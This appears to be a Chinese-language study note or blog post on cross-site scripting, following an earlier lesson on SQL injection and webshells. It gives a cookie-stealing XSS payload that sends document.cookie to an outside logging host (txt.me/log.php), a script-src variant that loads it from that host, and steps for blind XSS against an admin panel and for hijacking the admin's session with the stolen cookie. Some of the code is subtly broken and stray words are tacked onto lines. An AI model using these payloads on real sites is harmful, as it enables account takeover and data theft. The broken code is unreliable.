11/28~11/30 學習內容 高燒2天ing

 

上一節課,咱們經過SQL注入獲取目標數據庫中的數據,再經過獲取賬戶密碼,進行爆破、後臺路徑成功地登陸進入後臺,再經過後臺的文件上傳漏洞,成功地獲取網站的webshell,也就是獲取了目標網站的權限。php

 

今天咱們講XSSweb

 

 

XSS利用方式   攻擊客戶端  竊取用戶信息   管理員shell

                                                                     普通用戶數據庫

 

SQL注入利用數據   提權  寫文件提權cookie

 

 

XSS經常使用的幾個payloaddom

<img/src=x>xss

<svg/onload=alert(1)>svg

<script>alert(1)<script>測試

第一種加載圖片,後兩種彈窗網站

<!--   註釋的方式,容易形成頁面混亂

 

 

好比像測試的一個網站,有個用戶註冊,咱們經過修改信息達到彈窗的目的。而管理員只有在後臺點開會員信息時,纔會彈窗

這就是XSS盲打,因此說失敗率仍是挺高的,可是事情咱們仍是要去作

 

當我把咱們的cookie改爲管理員的cookie時,就至關於咱們有管理員的權限了。

可使用Editthiscookie

 

 

payload:new image().src ="http://domain.com/log.php?c=" + encodeURL(document.cookie);

 

 JS的一個語法

document.cookie的內容以下

 

 

 

此時咱們加上標籤    <script>new image().src ="http:/txt.me/log.php?c=" + encodeURL(document.cookie);</script>

 

 http:/txt.me/log.php?c=

咱們這個域名下有個log.php的目錄,後面有個參數c,假如咱們隨便輸入一段內容,c=23333

 

 

那麼這段內容會被存儲到cookie.txt中

 

 

 

 

當咱們插入xss的payload時,發現有字符串限制時怎麼辦呢

利用src  外部的Js腳本屬性    <script src=//txt.me/1.js></script>

1.js就是咱們上面字符串的內容

 

 

插入後,咱們能夠查看一下有沒有成功

 

 

咱們剛纔進入了兩次,成功記錄了2次

 

 咱們能夠對比一下是否是咱們的cookie   查看Headers

 

 

 當管理員在後臺點擊會員管理時,就會觸發

而後咱們得到管理員cookie後,開始替換

 

 

 

 

 

 成功替換,刷新一下頁面,此時咱們就是管理員頁面了

 

 end

 

XSS平臺的使用

未完待續

相關文章
相關標籤/搜索